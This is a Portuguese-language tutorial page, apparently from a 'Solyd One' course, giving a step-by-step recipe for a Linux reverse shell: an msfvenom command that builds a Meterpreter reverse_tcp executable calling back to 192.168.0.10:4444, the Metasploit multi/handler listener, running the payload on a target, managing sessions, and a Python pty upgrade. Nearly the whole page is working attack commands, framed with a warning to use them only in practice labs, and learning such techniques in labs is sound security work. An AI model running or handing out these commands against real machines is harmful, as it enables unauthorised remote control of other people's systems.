Skip to main content

Shell Reverse | Script automatizados | Solyd One

  • Shell Reverse | Script automatizados | Solyd One

Playlist Solyd One: 🔗 Criando um shell reverse


✅ Ambiente: Linux ou Kali Linux ⚠️ Use apenas em laboratórios como HackTheBox, TryHackMe, VMs como Metasploitable, etc.


🧱 ETAPA 1 – Gerar o Payload com msfvenom

🔹 Exemplo: Payload linux/x86/meterpreter/reverse_tcp

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=4444 -f elf -o shell_reverso.elf
ParâmetroFunção
-pPayload a ser usado (reverso, TCP)
LHOSTIP da máquina atacante (onde o msfconsole ouvirá)
LPORTPorta que será usada para receber a conexão
-f elfFormato do arquivo de saída (executável Linux)
-oNome do arquivo gerado

📁 Resultado: Um executável Linux chamado shell_reverso.elf


🖥 ETAPA 2 – Preparar o msfconsole para escutar

🔹 Passos dentro do msfconsole:

msfconsole

Então, digite:

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.0.10
set LPORT 4444
exploit
ComandoFunção
use exploit/multi/handlerCarrega o módulo genérico de escuta
set payload ...Define o mesmo payload usado no msfvenom
set LHOST / LPORTDefine IP e porta local para escuta
exploitInicia o listener

✅ Agora o Metasploit está escutando conexões reversas.


🧪 ETAPA 3 – Executar o Payload no Alvo

Em uma máquina de teste (como uma VM com Metasploitable), envie e execute o arquivo:

chmod +x shell_reverso.elf
./shell_reverso.elf

⚠️ Isso fará com que a máquina teste tente se conectar de volta ao IP e porta definidos.


📡 ETAPA 4 – Gerenciar a Sessão

Se a conex\u00e3o for bem-sucedida, voc\u00ea ver\u00e1 algo como:

[*] Meterpreter session 1 opened

Então, para interagir:

sessions -l         # lista as sessões ativas
sessions -i 1 # interage com a sessão 1

Dentro da sessão meterpreter, você pode usar comandos como:

sysinfo             # mostra informações do sistema
getuid # mostra o usuário atual
shell # acessa o terminal do sistema remoto

Para sair:

background          # volta ao msfconsole
exit # encerra a sessão ou o msfconsole

Pós

  • Obter um shell mais ajeitado
python -c "import pty; pty.spawn('/bin/bash');"